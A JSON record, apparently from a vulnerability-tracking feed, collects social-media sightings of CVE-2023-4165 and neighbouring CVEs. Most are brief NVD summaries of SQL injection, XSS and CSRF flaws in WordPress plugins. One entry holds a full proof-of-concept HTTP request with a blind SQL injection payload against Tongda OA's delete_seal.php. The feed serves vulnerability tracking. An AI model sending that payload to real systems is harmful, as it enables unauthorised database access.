{"vulnerability": "cve-2023-4165", "sightings": [{"uuid": "f5d526cd-a652-4a82-bdd6-5efe72b80e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41652", "type": "seen", "source": "https://t.me/cibsecurity/73521", "content": "\u203c CVE-2023-41652 \u203c\n\nImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-11-03T15:23:26.000000Z"}, {"uuid": "f6e4c38b-a14d-417e-a096-5d2338e8cd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41656", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mb6cyenwnm2e", "content": "", "creation_timestamp": "2025-12-30T02:37:13.274064Z"}, {"uuid": "41196796-2b1f-4056-b80e-ddd5c536bdd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41658", "type": "seen", "source": "https://t.me/cibsecurity/71305", "content": "\u203c CVE-2023-41658 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Photo Gallery Slideshow & Masonry Tiled Gallery plugin <=\u00c2\u00a01.0.13 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:56.000000Z"}, {"uuid": "53b9f705-5679-42a6-aa26-d27b26fb34e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41657", "type": "seen", "source": "https://t.me/cibsecurity/71302", "content": "\u203c CVE-2023-41657 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Groundhogg Inc. HollerBox plugin <=\u00c2\u00a02.3.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:52.000000Z"}, {"uuid": "878749e6-f952-412c-82ff-7e5ccf89114b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41655", "type": "seen", "source": "https://t.me/cibsecurity/71297", "content": "\u203c CVE-2023-41655 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Andreas Heigl authLdap plugin <=\u00c2\u00a02.5.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:47.000000Z"}, {"uuid": "be4fd763-d8ee-4186-983c-74e2502b7850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4165", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/858", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4165  POC\n\nGET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc\n#poc", "creation_timestamp": "2023-08-12T14:58:46.000000Z"}, {"uuid": "1702c1ec-a08b-4055-837c-5982bca4f5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41659", "type": "seen", "source": "https://t.me/cibsecurity/71728", "content": "\u203c CVE-2023-41659 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Jules Colle, BDWM Responsive Gallery Grid plugin <=\u00c2\u00a02.3.10 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:42.000000Z"}, {"uuid": "f4b1bf4a-4d47-4593-b606-76977678ba2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41650", "type": "seen", "source": "https://t.me/cibsecurity/71725", "content": "\u203c CVE-2023-41650 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Venugopal Remove/hide Author, Date, Category Like Entry-Meta plugin <=\u00c2\u00a02.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:39.000000Z"}, {"uuid": "a869d187-22dd-4c6b-b1e3-9fc45a08da0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41654", "type": "seen", "source": "https://t.me/cibsecurity/71721", "content": "\u203c CVE-2023-41654 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Andreas Heigl authLdap plugin <=\u00c2\u00a02.5.8 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:35.000000Z"}]}